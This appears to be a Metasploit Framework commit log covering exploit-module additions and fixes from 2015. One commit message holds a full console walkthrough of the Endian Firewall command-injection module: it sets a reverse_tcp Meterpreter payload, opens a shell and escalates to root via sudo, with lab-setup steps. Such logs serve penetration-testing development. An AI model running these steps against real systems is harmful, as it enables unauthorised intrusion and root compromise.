6e12cbf98f
Land #5712 , php_wordpress_lastpost removal
...
Deprecated.
2015-07-13 18:31:31 +00:00
dd188b1943
Land #5713 , php_wordpress_infusionsoft removal
...
Deprecated.
2015-07-13 18:31:01 +00:00
4960e64597
Remove php_wordpress_foxypress, use wp_foxypress_upload
...
Please use exploit/unix/webapp/wp_foxypress_upload instead.
2015-07-13 12:53:34 -05:00
dfbeb24a8f
Remove php_wordpress_infusionsoft, use wp_infusionsoft_upload
...
Please use exploit/unix/webapp/wp_infusionsoft_upload instead.
2015-07-13 12:51:48 -05:00
b80427aed2
Remove php_wordpress_lastpost, use wp_lastpost_exec instead.
...
Please use exploit/unix/webapp/wp_lastpost_exec instead
2015-07-13 12:49:27 -05:00
90cc3f7891
Remove php_wordpress_optimizepress, use wp_optimizepress_upload
...
Please use exploit/unix/webapp/wp_optimizepress_upload instead.
2015-07-13 12:45:39 -05:00
4177cdacd6
Remove php_wordpress_total_cache, please use wp_total_cache_exec
...
The time is up for exploit/unix/webapp/php_wordpress_total_cache,
please use exploit/unix/webapp/wp_total_cache_exec instead.
2015-07-13 12:41:29 -05:00
e638d85f30
Merge branch 'upstream-master' into bapv2
2015-07-12 02:01:09 -05:00
8819674522
updated per feedback from PR
2015-07-11 21:03:02 -04:00
f7ce6dcc9f
We agreed to Normal
2015-07-11 02:07:18 -05:00
0ff7333090
Lower the ranking for CVE-2015-5122
...
As an initial release we forgot to lower it.
2015-07-11 02:05:56 -05:00
1289ec8863
authors
2015-07-11 01:38:21 -05:00
6eabe5d48c
Update description
2015-07-11 01:36:26 -05:00
54fc712131
Update Win 8.1 checks
2015-07-11 01:33:23 -05:00
6f0b9896e1
Update description
2015-07-11 00:56:18 -05:00
115549ca75
Delete old check
2015-07-11 00:42:59 -05:00
63005a3b92
Add module for flash CVE-2015-5122
...
* Just a fast port for the exploit leaked
* Just tested on win7sp1 / IE11
2015-07-11 00:28:55 -05:00
bff92f2304
Initial add
2015-07-10 21:13:12 -04:00
5a045677bc
Add waiting message
2015-07-10 18:48:46 -05:00
8d52c265d9
Delete wfsdelay
2015-07-10 18:46:27 -05:00
63e91fa50f
Add reference
2015-07-10 18:46:06 -05:00
677cd97cc2
Update information
2015-07-10 18:39:11 -05:00
6c6a778218
Modify arkeia_agent_exec title
2015-07-10 18:38:25 -05:00
4995728459
Modify arkeia_agent_exec ranking
2015-07-10 18:37:24 -05:00
858f63cdbf
Land #5693 , @xistence VNC Keyboard EXEC module
2015-07-10 18:35:44 -05:00
1326a26be5
Do code cleanup
2015-07-10 18:35:13 -05:00
917282a1f1
Fix ranking
2015-07-10 17:49:15 -05:00
e063e26627
Land #5689 , @xistence's module for Western Digital Arkeia command injection
2015-07-10 17:11:35 -05:00
bdd8b56336
fix comment
2015-07-10 16:28:20 -05:00
95ae7d8cae
Fix length limitation
2015-07-10 16:24:49 -05:00
3347b90db7
Land #5676 , print_status with ms14_064
2015-07-10 14:40:49 -05:00
29a497a616
Read header as 6 bytes
2015-07-10 14:25:57 -05:00
bed3257a3f
Change default HTTP_DELAY
2015-07-10 12:50:26 -05:00
c9d2ab58d3
Use HttpServer::HTML
...
* And make the exploit Aggressive
2015-07-10 12:48:21 -05:00
e1192c75a9
Fix network communication on `communicate`
...
* Some protocol handling just to not read amounts of data blindly
2015-07-10 11:57:48 -05:00
9206df077f
Land #5694 , R7-2015-08
2015-07-10 11:42:57 -05:00
9ba515f185
Fix network communication on `check`
...
* Some protocol handling just to not read amounts of data blindly
2015-07-10 11:32:49 -05:00
c70be64517
Fix version check
2015-07-10 10:57:55 -05:00
34a6984c1d
Fix variable name
2015-07-10 10:44:38 -05:00
2c7cc83e38
Use single quotes
2015-07-10 10:34:47 -05:00
f66cf91676
Fix metadata
2015-07-10 10:33:02 -05:00
b916a9d267
VNC Keyboard Exec
2015-07-10 14:08:32 +07:00
13a69e4011
X11 Keyboard Exec
2015-07-10 13:57:54 +07:00
52d41c8309
Western Digital Arkeia 'ARKFS_EXEC_CMD' <= v11.0.12 Remote Code Execution
2015-07-10 09:51:28 +07:00
d7beb1a685
feedback included
2015-07-09 08:31:11 +02:00
25e0f888dd
Initial commit of R7-2015-08 coverage
2015-07-08 13:42:11 -05:00
a3ec56c4cb
Do it in on_request_exploit because it's too specific
2015-07-08 12:32:38 -05:00
cefbdbb8d3
Avoid unreliable targets
...
If we can't garantee GreatRanking on specific targets, avoid them.
2015-07-08 12:12:53 -05:00
6a33807d80
No Chrome for now
2015-07-07 15:56:58 -05:00
f8b668e894
Update ranking and References
2015-07-07 15:43:02 -05:00
116c3f0be1
Add CVE as a real ref, too
2015-07-07 14:46:44 -05:00
3d630de353
Replace with a real CVE number
2015-07-07 14:44:12 -05:00
fdb715c9dd
Merge branch 'upstream-master' into bapv2
2015-07-07 13:45:39 -05:00
829b08b2bf
Complete authors list
2015-07-07 12:49:54 -05:00
49effdf3d1
Update description
2015-07-07 12:46:02 -05:00
d885420aff
This changes the version requirement for adobe_flash_hacking_team_uaf.rb
...
Because it works for Win 8.1 + IE11 too
2015-07-07 12:42:56 -05:00
d30688b116
Add more requirement info
2015-07-07 12:33:47 -05:00
d9aacf2d41
Add module for hacking team flash exploit
2015-07-07 11:19:48 -05:00
c37b60de7b
Do some print_status with ms14_064
2015-07-07 00:57:37 -05:00
5b6ceff339
mime message
2015-07-06 15:00:12 +02:00
133e221dcd
Remove unnecessary steps.
2015-07-05 19:00:58 -05:00
c993c70006
Remove sleep(), clean up WritableDir usage.
2015-07-05 18:59:00 -05:00
72a1e9ad99
Add module for rootpipe+entitlements exploit for 10.10.3.
2015-07-05 18:19:46 -05:00
6e9a477367
Removed reference URL for the report to the vendor, as it is no
...
longer valid.
2015-07-03 13:48:24 -07:00
02ace9218b
Added handling for HTTP 401 (Authorization Required) response from target.
...
Added Exploit DB entries to references list.
Minor change to description text for clarity.
2015-07-03 13:36:44 -07:00
43d47ad83e
Port BAPv2 to Auxiliary
2015-07-02 15:29:24 -05:00
8892cbdd10
Fix some minor things
2015-07-02 14:32:16 -05:00
95f19e6f1f
Minor description edits for clarity
...
Edited modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
first landed in #5642 , Adobe Flash CVE-2015-3113 Nellymoser Audio
Decoding BOF
Edited modules/post/windows/gather/credentials/enum_laps.rb first landed
in #5590 , @Meatballs1 adds MS LAPS Enum post mod
Edited modules/post/windows/gather/enum_ad_bitlocker.rb first landed in
Keys from AD
2015-07-02 13:51:37 -05:00
87e6325737
Revert BAPv2 changes to framework/libraries/handlers
2015-07-02 12:10:21 -05:00
e355e56539
Add check
2015-07-02 10:54:44 +02:00
2957924c78
Merge branch 'upstream-master' into bapv2
2015-07-02 01:46:31 -05:00
3f5721f5be
Fixed identified issues.
2015-07-02 13:06:03 +12:00
3b9ba189f7
Add CVE-2015-3043 information
2015-07-01 19:56:35 -05:00
8051a99f4a
Merge branch 'upstream-master' into bapv2
2015-07-01 18:45:42 -05:00
32d5e7f3de
Land #5642 , Adobe Flash CVE-2015-3113 Nellymoser Audio Decoding BOF
2015-07-01 18:44:38 -05:00
93c74efb97
Add Ubuntu as a tested target
2015-07-01 18:43:22 -05:00
ee118aa89d
Fix description
2015-07-01 13:30:22 -05:00
1de94a6865
Add module for CVE-2015-3113
2015-07-01 13:13:57 -05:00
db721dff8e
Cleaned up double-negative logic.
...
Decreased default HTTPClientTimeout to 5 seconds.
2015-07-01 09:34:11 -07:00
6ceb734972
Replaced standard option TIMEOUT with advanced option
...
HTTPClientTimeout per void-in's request.
Added handling for HTTP 404 response condition from server.
2015-07-01 09:04:15 -07:00
56c3102603
That's what you get for making edits on github.com..
2015-07-01 17:51:57 +02:00
4847fb9830
Add a neater powershell command
2015-07-01 17:47:47 +02:00
822a46fee6
Merge branch 'master' of github:dmaasland/metasploit-framework
2015-07-01 17:47:33 +02:00
4f72df3202
Create a neater powershell command
2015-07-01 17:47:08 +02:00
ffe710af2d
Update registry_persistence.rb
...
Omg spaces
2015-07-01 17:21:12 +02:00
26e3ec0a5f
Add a switch for creating a cleanup rc file
2015-07-01 17:06:16 +02:00
20708ebc82
Add a check to prevent accidental deletion of existing registry keys
2015-07-01 16:45:03 +02:00
2e48bae71c
fixes
2015-07-01 16:15:13 +02:00
335487afa0
fixes
2015-07-01 16:09:55 +02:00
d0845b8c66
msftidy fix
2015-07-01 12:50:34 +02:00
a3db6c6ae3
Msftidy fix
2015-07-01 12:47:10 +02:00
bd94f50fb0
add registry_persistence.rb
2015-07-01 12:26:46 +02:00
f48bb4250e
Removed some overly verbose output.
2015-07-01 22:03:42 +12:00
1ede519b8d
Added Watchguard XCS remote root exploit module.
2015-07-01 21:11:23 +12:00
3d32438b34
Added missing closing paren in description text.
2015-06-30 12:43:31 -07:00
e929dec829
Re-formatted and tweaked the module description.
2015-06-30 12:42:17 -07:00
3632cc44c5
Fix nil error when target not found
2015-06-30 11:48:41 -05:00
ce61bcd3b4
Removed a trailing space from line 40.
2015-06-29 22:48:16 -07:00
13dc181f1c
Exploit Module: Endian Firewall Proxy Password Change Command Injection
...
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
(CVE is new as of today, so that page may not display correctly yet)
Targets an OS command injection vulnerability in most released versions
of Endian Firewall. Tested successfully against the following versions:
1.1 RC5
2.0
2.1
2.2
2.5.1
2.5.2
Known to not work against the following versions, due to bugs in the
vulnerable CGI script which also prevent normal use of it:
2.3
2.4.0
3.0.0
3.0.5 beta 1
Requires that at least one username and password be defined in the
local auth store for the Squid proxy component on the system, and that
the attacker know that username and password. Administrative or other
credentials are not required.
Provides OS command execution as the "nobody" account, which (on
all tested versions) has sudo permission to (among other things) run
a script which changes the Linux root account's password.
Example usage / output:
```
msf > use exploit/linux/http/efw_chpasswd_exec
msf exploit(efw_chpasswd_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(efw_chpasswd_exec) > set LHOST 172.16.47.13
LHOST => 172.16.47.13
msf exploit(efw_chpasswd_exec) > set LPORT 443
LPORT => 443
msf exploit(efw_chpasswd_exec) > set RHOST 172.16.47.1
RHOST => 172.16.47.1
msf exploit(efw_chpasswd_exec) > set EFW_USERNAME proxyuser
EFW_USERNAME => proxyuser
msf exploit(efw_chpasswd_exec) > set EFW_PASSWORD password123
EFW_PASSWORD => password123
msf exploit(efw_chpasswd_exec) > exploit
[*] Started reverse handler on 172.16.47.13:443
[*] Command Stager progress - 18.28% done (196/1072 bytes)
[*] Command Stager progress - 36.57% done (392/1072 bytes)
[*] Command Stager progress - 54.85% done (588/1072 bytes)
[*] Command Stager progress - 73.13% done (784/1072 bytes)
[*] Command Stager progress - 91.42% done (980/1072 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.47.1
[*] Meterpreter session 1 opened (172.16.47.13:443 -> 172.16.47.1:36481) at 2015-06-29 10:20:13 -0700
[*] Command Stager progress - 100.47% done (1077/1072 bytes)
meterpreter > getuid
Server username: uid=99, gid=99, euid=99, egid=99, suid=99, sgid=99
meterpreter > sysinfo
Computer : efw220.vuln.local
OS : Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 (i686)
Architecture : i686
Meterpreter : x86/linux
meterpreter > shell
Process 5768 created.
Channel 1 created.
sh: no job control in this shell
sh-3.00$ whoami
nobody
sh-3.00$ uname -a
Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 i686 i686 i386 GNU/Linux
sh-3.00$ sudo /usr/local/bin/chrootpasswd
IlikerootaccessandIcannotlie
sh-3.00$ su
Password:IlikerootaccessandIcannotlie
bash: no job control in this shell
bash-3.00# whoami
root
```
Steps to verify module functionality:
Go to http://sourceforge.net/projects/efw/files/Development/
Select version 2, 2.1, 2.2, 2.5.1, or 2.5.2.
Download the ISO file for that version.
Create a VM using the ISO:
For purposes of VM configuration:
- Endian is based on the RHEL/CentOS/Fedora Core Linux
distribution.
- The ISOs will create a 32-bit x86 system.
- 512MB of RAM and 4GB of disk space should be more than enough.
- Be sure to configure the VM with at least two NICs, as the Endian
setup is difficult (impossible?) to complete with less than two
network interfaces on the host.
For the Endian OS-level (Linux) installation:
- Default options are fine where applicable.
- Be sure to pick a valid IP for the "Green" network interface, as
you will use it to access a web GUI to complete the configuration
- If prompted to create a root/SSH password and/or web admin
password, make a note of them. Well, make a note of the web admin
password - the exploit module will let you change the root
password later if you want to. This step is dependent on the
version selected - some will prompt, others default the values to
"endian".
- Once the OS-level configuration is complete, access the web
interface to complete the setup. If you used 172.16.47.1 for the
"Green" interface, then the URL will be
https://172.16.47.1:10443/
- If the web interface is not accessible, reboot the VM (in some
versions, the web interface does not come up until after the
first post-installation reboot).
For the web interface-based configuration:
- If you were prompted to select an admin password, use it. If not,
the username/password is admin/endian.
- Use the second NIC for the "Red" interface. It will not actually
be used during this walkthrough, so feel free to specify a bogus
address on a different/nonexistent subnet. Same for its default
gateway.
- Once the base configuration is complete, access the main web
interface URL again.
- Switch to the Proxy tab.
- Enable the HTTP proxy.
- Click Save (or Apply, depending on version).
- If prompted to apply the settings, do so.
- Click on the Authentication sub-tab.
- Make sure the Authentication Method is Local (this should be the
default).
- Click the _manage users_ (Or _User management_, etc., depending
on version) button.
- Click the _Add NCSA user_ (or _Add a user_, etc.) link.
- Enter "proxyuser" for the username, and "password123" for the
password, or modify the directions below this point accordingly.
- Click the _Create user_ button.
- If prompted to apply the settings, do so.
Module test process:
From within the MSF console, execute these commands:
use exploit/linux/http/efw_chpasswd_exec
set payload linux/x86/meterpreter/reverse_tcp
set LHOST [YOUR_HOST_IP]
set LPORT 443
set RHOST [ENDIAN_GREEN_IP]
set EFW_USERNAME proxyuser
set EFW_PASSWORD password123
exploit
Once Meterpreter connects, execute the following Meterpreter
commands:
getuid
sysinfo
shell
Within the OS shell, execute the following commands:
whoami
uname -a
sudo -l
sudo /usr/local/bin/chrootpasswd
It will appear as though the command has hung, but it is actually
waiting for input. Type "IlikerootaccessandIcannotlie", then press
enter.
Execute the following OS command in the shell:
su
Type "IlikerootaccessandIcannotlie", then press enter.
Verify root access (whoami, etc.).
2015-06-29 12:03:17 -07:00
7aeb9e555b
Change ranking and support CAMPAIGN_ID
2015-06-29 12:13:46 -05:00
1d50bda609
initial add of blank file
2015-06-27 21:38:25 -04:00
9bd920b169
Merge branch 'upstream-master' into bapv2
2015-06-27 12:19:55 -05:00
326bec0a1f
Land #5581 , s/shell_command_token/cmd_exec/
2015-06-26 16:59:40 -05:00
a10fa02b00
Land #5606 , @wchen-r7's glassfish fixes
2015-06-26 14:12:50 -05:00
3b5e2a0c6e
Use TARGETURI
2015-06-26 14:02:17 -05:00
b46e1be22f
Land #5371 , Add file checking to the on_new_session cleanup
2015-06-26 13:33:57 -05:00
31eedbcfa0
Minor cleanups on recent modules
...
Edited modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
first landed in #5577 , MS15-034 HTTP.SYS Information Disclosure
Edited modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb
first landed in #5605 , CVE-2015-3105 flash exploit
Edited modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb
first landed in #5559 , Adobe Flash Player ShaderJob Buffer Overflow
Edited modules/auxiliary/test/report_auth_info.rb first landed in #5540 ,
@wchen-r7's changes for multiple auxiliary modules to use the new cred
API
2015-06-26 12:18:33 -05:00
7ccc86d338
Use cmd_exec
2015-06-26 11:54:19 -05:00
31b7ef49d6
Solve conficts
2015-06-26 11:36:17 -05:00
c70e38a14e
Do more reporting
2015-06-25 22:39:56 -05:00
5ef4cc2bb4
Save creds
2015-06-25 17:10:20 -05:00
1a371b11b0
Update description
2015-06-25 17:04:31 -05:00
ee0377ca16
Add module for CVE-2015-3105
2015-06-25 13:35:01 -05:00
c330d10403
Make SSL as a basic option
...
Also:
Fix #5558
2015-06-25 02:06:51 -05:00
5c98da05fb
This works for Glassfish 4.0 & 9.1
2015-06-25 01:58:24 -05:00
c826785ebb
Fix auth bypass
2015-06-24 19:49:04 -05:00
8e4fa80728
This looks good so far
2015-06-24 19:30:02 -05:00
2206a6af73
Support older targets x86 for MS15-051
2015-06-25 09:33:15 +10:00
a149fb5710
Land #5554 , @g0tmi1k's persistence improvements
...
age aborts
age aborts
2015-06-24 14:37:25 -05:00
e7e8135acd
Clean up module
2015-06-24 14:35:10 -05:00
c8dddbff70
server header
2015-06-24 21:32:01 +02:00
380af29482
Progress?
2015-06-24 14:17:45 -05:00
8bc012a665
echo stager via upload vulnerability
2015-06-23 23:09:08 +02:00
6046994138
version does not return nil
2015-06-23 10:31:01 -05:00
dedfca163d
Change check()
2015-06-22 15:05:12 -05:00
784be06b6f
Update nmap
...
* Use cmd_exec
2015-06-22 14:20:02 -05:00
d98d2ffd4d
Update setuid_viscosity
...
* Use cmd_exec
2015-06-22 14:04:04 -05:00
60bdc10aed
Update setuid_tunnelblick
...
* Use cmd_exec
2015-06-22 13:57:33 -05:00
6a00ce62de
Update persistence module
...
* Delete unused method
2015-06-22 12:25:00 -05:00
3686accadd
Merge branch 'upstream/master' into cve-2015-1701
2015-06-22 07:52:17 +10:00
efece12b40
Minor clean ups for ruby strings and check method
2015-06-21 16:07:44 -04:00
ea49fd2fdc
Update sysaid_rdslogs_fle_upload.rb
2015-06-20 16:59:28 +01:00
3181d76e63
Update sysaid_auth_file_upload.rb
2015-06-20 16:53:33 +01:00
d8e11789ea
cmd_interact - first try
2015-06-20 07:59:25 +02:00
74bc9f7a91
Land #5529 , @omarix's Windows 2003 SP1 & SP2 French targets for MS08-067
2015-06-19 16:57:07 -05:00
61ad4ada7d
Delete commas
2015-06-19 16:03:16 -05:00
9da99a8265
Merge branch 'upstream-master' into bapv2
2015-06-19 11:36:27 -05:00
2587595a92
Land #5556 , vprint_status fix
2015-06-19 11:24:54 -05:00
b994801172
Revert auto tab replacement
2015-06-19 11:22:40 -05:00
6ec8488929
Land #5560 , @wchen-r7 Changes ExcellentRanking to GoodRanking for MS14-064
2015-06-19 11:15:41 -05:00
15985e8b4f
Land #5559 , Adobe Flash Player ShaderJob Buffer Overflow
2015-06-19 10:38:05 -05:00
c95b3bb31d
Land #5479 , @wchen-r7 Updates kloxo_sqli to use the new cred API
2015-06-19 10:32:21 -05:00
c2f0973ed0
Report attempt_time
2015-06-19 10:31:50 -05:00
1c357e6b3c
Land #5478 , @wchen-r7 Updates ca_arcserve_rpc_authbypass to use the new cred API
2015-06-19 10:21:14 -05:00
0f17f622c3
Report last_attempted_at
2015-06-19 10:20:47 -05:00
357a3929a3
Trying to report more accurate status
2015-06-19 09:51:36 -05:00
7e91121afc
Change to Metasploit::Model::Login::Status::SUCCESSFUL
2015-06-18 23:44:45 -05:00
fb9ad663f7
Change to Metasploit::Model::Login::Status::SUCCESSFUL
2015-06-18 23:42:16 -05:00
0b55a889d3
persistence - better ruby/msf fu
2015-06-18 21:10:16 +01:00
afcb016814
Minor description fixups.
...
Edited modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
first landed in #5524 , adobe_flash_pixel_bender_bof in flash renderer .
Removed ASCII bullets since those rarely render correctly.
Edited modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
first landed in #5252 , @espreto's module for WordPress Front-end Editor
File Upload Vuln . Fixed up some language usage, camel-cased "WordPress."
2015-06-18 13:25:39 -05:00
13a3f2781d
Change ExcellentRanking to GoodRanking for MS14-064
...
The ms14_064_ole_code_execution exploit's ranking is being lowered
to GoodRanking because of these two reasons:
1. The vulnerable component isn't in Internet Explorer. And BES can't
check it so the exploit still fires even if the target is patched.
2. Although rare, we've seen the exploit crashing IE, and since this
is a memory curruption type of bug, it should not be in Excellent
ranking anyway.
2015-06-18 13:07:44 -05:00
de1542e589
Add module for CVE-2015-3090
2015-06-18 12:36:14 -05:00
ce9481d2b7
Inconstancy - If datastore['VERBOSE'] vs vprint
2015-06-18 09:27:01 +01:00
a3debe1621
persistence - more options, more verbose
...
...and less bugs!
+ Able to define the EXE payload filename
+ Able to setup a handler job
+ Able to execute persistence payload after installing
+ Performs various checks (should be more stable now)
+ Will display various warnings if your doing something 'different'
+ Added various verbose messages during the process
2015-06-17 13:57:06 +01:00
8d640a0c8f
Land #5527 , multi/handler -> exploit/multi/handler
2015-06-15 10:23:26 -05:00
17b8ddc68a
Land #5524 , adobe_flash_pixel_bender_bof in flash renderer
2015-06-15 02:42:16 -05:00
145637470a
port, email, cleanup
2015-06-14 08:27:23 +02:00
1b040f3374
dsp-w110-command-injection
2015-06-13 21:45:56 +02:00
c7cda25582
Empty lines removed at line 624 and line 721.
...
Empty lines removed at line 624 and line 721.
2015-06-13 14:54:10 +01:00
7f0e334d78
Added Windows 2003 SP1 & SP2 French targets
...
msf exploit(ms08_067_netap) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
[...]
62 Windows 2003 SP1 French (NX)
63 Windows 2003 SP2 English (NO NX)
[...]
71 Windows 2003 SP2 French (NO NX)
72 Windows 2003 SP2 French (NX)
2015-06-13 13:30:02 +01:00
a53ca53a6a
Fix inconstancy - multi/handler
2015-06-12 21:23:51 +01:00
f279c6ca3f
Land #5252 , @espreto's module for WordPress Front-end Editor File Upload Vuln
2015-06-12 15:11:10 -05:00
8ed13b1d1b
Add linux support for CVE-2014-0515
2015-06-11 16:18:50 -05:00
ae21b0c260
Land #5523 , adobe_flash_domain_memory_uaf in the flash renderer
2015-06-10 16:59:19 -05:00
4c5b1fbcef
Land #5522 , adobe_flash_worker_byte_array_uaf in the flash renderer
2015-06-10 14:49:41 -05:00
6c7ee10520
Update to use the new flash Exploiter
2015-06-10 13:52:43 -05:00
d622c782ef
Land #5519 , adobe_flash_uncompress_zlib_uninitialized in the flash renderer
2015-06-10 11:52:47 -05:00
667db8bc30
Land #5517 , adobe_flash_casi32_int_overflow (exec from the flash renderer)
2015-06-10 11:39:13 -05:00
b23647d5ae
Land #5521 , @todb-r7's module cleanup
2015-06-10 11:29:41 -05:00
0d979f61ae
Minor fixups on newish modules
2015-06-10 11:09:42 -05:00
fb531d0069
Update version coverage
2015-06-10 09:38:00 -05:00
a6fe383852
Use AS Exploiter
2015-06-10 09:32:52 -05:00
e5d6c9a3cb
Make last code cleanup
2015-06-09 16:01:57 -05:00
cf8c6b510b
Debug version working
2015-06-09 15:46:21 -05:00
9fa423464c
Fix #5224 , comma fixes
...
My fault for missing these.
2015-06-09 14:28:01 -05:00
8a69704d3e
Fix up commas
2015-06-09 14:27:35 -05:00
d31a59cd22
Fix #5224 , altered option description
2015-06-09 14:15:58 -05:00
cc8650f98a
Fix TMPPATH description
2015-06-09 14:15:18 -05:00
9c97da3b7c
Land #5224 , ProFTPD mod_copy exploit
2015-06-09 14:11:27 -05:00
5ab882a8d4
Clean up module
2015-06-09 14:10:46 -05:00
b7f0fad72f
Modify CVE-2014-0569 to use the flash exploitation code
2015-06-09 11:31:39 -05:00
ea33d7060e
Correct ranking
2015-06-05 21:07:27 -05:00
ff39e32cc6
Single quote
2015-06-05 21:06:57 -05:00
ee13a215e9
Merge branch 'upstream-master' into bapv2
2015-06-05 14:09:07 -05:00
318f67fcda
update descriptions
2015-06-05 09:01:20 -05:00
71a8487091
Correct Flash version in the module description
...
There is no 11.2.202.404, mang.
2015-06-04 23:46:41 -05:00
5f4b2ed22a
Newline
2015-06-04 23:36:36 -05:00
69968fc9f1
Merge branch 'upstream-master' into bapv2
2015-06-04 23:36:24 -05:00
02181addc5
Update CVE-2014-0556
2015-06-04 18:23:50 -05:00
23df66bf3a
Land #5481 , no powershell. exec shellcode from the renderer process.
2015-06-04 15:45:09 -05:00
ab68d8429b
Add more targets
2015-06-04 12:11:53 -05:00
be709ba370
Merge branch 'upstream-master' into bapv2
2015-06-04 10:33:07 -05:00
744baf2d44
Update kloxo_sqli to use the new cred API
2015-06-03 23:28:35 -05:00
80cb70cacf
Add support for Windows 8.1/Firefox
2015-06-03 22:46:04 -05:00
78e4677bb1
Oops it blew up
2015-06-03 20:10:01 -05:00
a0aa6135c5
Update ca_arcserve_rpc_authbypass to use the new cred API
2015-06-03 20:02:07 -05:00
74117a7a52
Allow to execute payload from the flash renderer
2015-06-03 16:33:41 -05:00
d5b33a0074
Update sysaid_rdslogs_fle_upload.rb
2015-06-03 22:01:13 +01:00
37827be10f
Update sysaid_auth_file_upload.rb
2015-06-03 22:00:44 +01:00
62993c35d3
Create sysaid_rdslogs_fle_upload.rb
2015-06-03 21:45:14 +01:00
193b7bcd2e
Create sysaid_auth_file_upload.rb
2015-06-03 21:44:02 +01:00
a6467f49ec
Update description
2015-06-03 22:17:25 +10:00
455a3b6b9d
Add butchered version of CVE-2015-1701
2015-06-03 21:48:23 +10:00
d03ee5667b
Remove assigned but unused local vars
2015-06-01 16:45:36 -05:00
7133f0a68e
Fix typo in author's name
2015-06-01 16:45:09 -05:00
e83677d29d
rm deprecated mod
2015-05-29 17:43:26 -05:00
13779adab4
Merge branch 'upstream-master' into bapv2
2015-05-29 14:59:04 -05:00
6be363d82a
Merge branch 'upstream-master' into bapv2
2015-05-29 14:58:38 -05:00
1be04a9e7e
Land #5182 , @m-1-k-3's exploit for Dlink UPnP SOAP-Header Injection
2015-05-29 14:49:09 -05:00
8b2e49eabc
Do code cleanup
2015-05-29 14:45:47 -05:00
8c7d41c50c
Land #5426 , @wchen-r7's adds more restriction on Windows 7 target for MS14-064
2015-05-29 14:35:44 -05:00
c3fa52f443
Update description
2015-05-29 13:47:20 -05:00
dab9a66ea3
Use current ruby hash syntax
2015-05-29 13:43:20 -05:00
9ccf04a63b
Land #5420 , @m-1-k-3's miniigd command injection module (ZDI-15-155)
2015-05-29 13:29:03 -05:00
9ebd6e5d6e
Use REXML
2015-05-29 13:27:19 -05:00
294fa78c1f
Land #5430 , @m-1-k-3's adding specific endianess Arch to some exploits
2015-05-29 11:43:25 -05:00
dd39d196f5
Land #5226 , @m-1-k-3's Airties login Buffer Overflow exploit
2015-05-29 10:51:32 -05:00
952f391fb4
Do minor code cleanup
2015-05-29 10:49:51 -05:00
2a260f0689
Update description
2015-05-28 15:18:05 -05:00
666b0bc34a
MIPSBE vs MIPS
2015-05-28 18:50:48 +02:00
e9714bfc82
Solve conflics
2015-05-27 23:22:00 -05:00
24b4dacec5
Land #5408 , @g0tmi1k fixes verbiage and whitespace
2015-05-27 21:02:02 -04:00
bcdae5fa1a
Forgot to add the datastore option
2015-05-27 18:12:38 -05:00
4f0e908c8b
Never mind, Vista doesn't have powershell.
2015-05-27 18:08:58 -05:00
d43706b65e
It doesn't look like Vista shows the powershell prompt
2015-05-27 18:04:35 -05:00
53774fed56
Be more strict with Win 7 for MS14-064
...
The Powershell prompt can cause BAP to hang so we need to be more
strict about that.
2015-05-27 18:01:40 -05:00
e5d42850c1
Add support for Linux to CVE-2015-0336
2015-05-27 17:05:10 -05:00
95b5ff6bea
Minor fixups on recent modules.
...
Edited modules/auxiliary/admin/http/netgear_soap_password_extractor.rb
first landed in #5301 , @m-1-k-3's aux module to extract passwords from
Netgear soap interfaces
Edited modules/auxiliary/scanner/http/influxdb_enum.rb first landed in
Edited modules/auxiliary/scanner/http/title.rb first landed in #5333 ,
HTML Title Grabber
Edited modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
first landed in #5401 , multi-platform CVE-2015-0311 - Flash uncompress()
UAF
Edited modules/exploits/unix/webapp/wp_revslider_upload_execute.rb first
landed in #5290 , Wordpress RevSlider Module
2015-05-26 17:00:10 -05:00
60cdf71e6c
Merge branch 'upstream-master' into bapv2
2015-05-26 15:56:48 -05:00
a0e0e3d360
Description
2015-05-25 17:24:41 -05:00
43f505b462
fix contact details
2015-05-25 19:31:50 +02:00
f953dc08d9
Land #5280 , @m-1-k-3's support for Airties devices to miniupnpd_soap_bof
2015-05-24 15:17:38 -05:00
10baf1ebb6
echo stager
2015-05-23 15:50:35 +02:00
60b0be8e3f
Fix a lot of bugs
2015-05-23 01:59:29 -05:00
5bceeb4f27
Land #5349 , @h0ng10's module for CVE-2015-2219 Lenovo System Update Local Privilege Escalation
2015-05-22 17:14:20 -05:00
9600f6a30a
rm deprecated exploit
2015-05-22 17:14:08 -05:00
6de75ffd9f
Merge branch 'upstream-master' into bapv2
2015-05-22 17:11:03 -05:00
eb5aadfb4e
Land #5401 , multi-platform CVE-2015-0311 - Flash uncompress() UAF
2015-05-22 16:50:13 -05:00
3aa1ffb4f5
Do minor code cleanup
2015-05-22 16:20:36 -05:00
2bb6f390c0
Add session limiter and fix a race bug in notes removal
2015-05-22 12:22:41 -05:00
03b70e3714
Land #5388 , @wchen-r7's fixes #5373 by add info to BrowserRequiements
2015-05-22 10:21:59 -05:00
6da94b1dd5
Deprecate windows module
2015-05-21 15:01:41 -05:00
b9f9647ab1
Use all the BES power
2015-05-21 14:06:41 -05:00
6e8ee2f3ba
Add whitelist feature
2015-05-21 00:05:14 -05:00
aa919da84d
Add the multiplatform exploit
2015-05-20 18:57:59 -05:00
2cadd5e658
Resolve #5373 , Add ActiveX info in BrowserRequirements
...
Resolve #5373
2015-05-20 16:34:09 -05:00
44f8cf4124
Add more size to stagers, adjust psexec payloads
...
This psexec payload size should be evaluated to make sure I'm not doing
anything stupid. i can't see a reason why increasing these sizes would
be bad. They seem to work fine.
2015-05-20 17:07:56 +10:00
a93565b5d1
Add 'Payload' section with 'Size' to psexec_psh
...
This missing parameter was causing the payload 'Size' to come through to
the encoders as `nil`. This meant that all the stagers that were
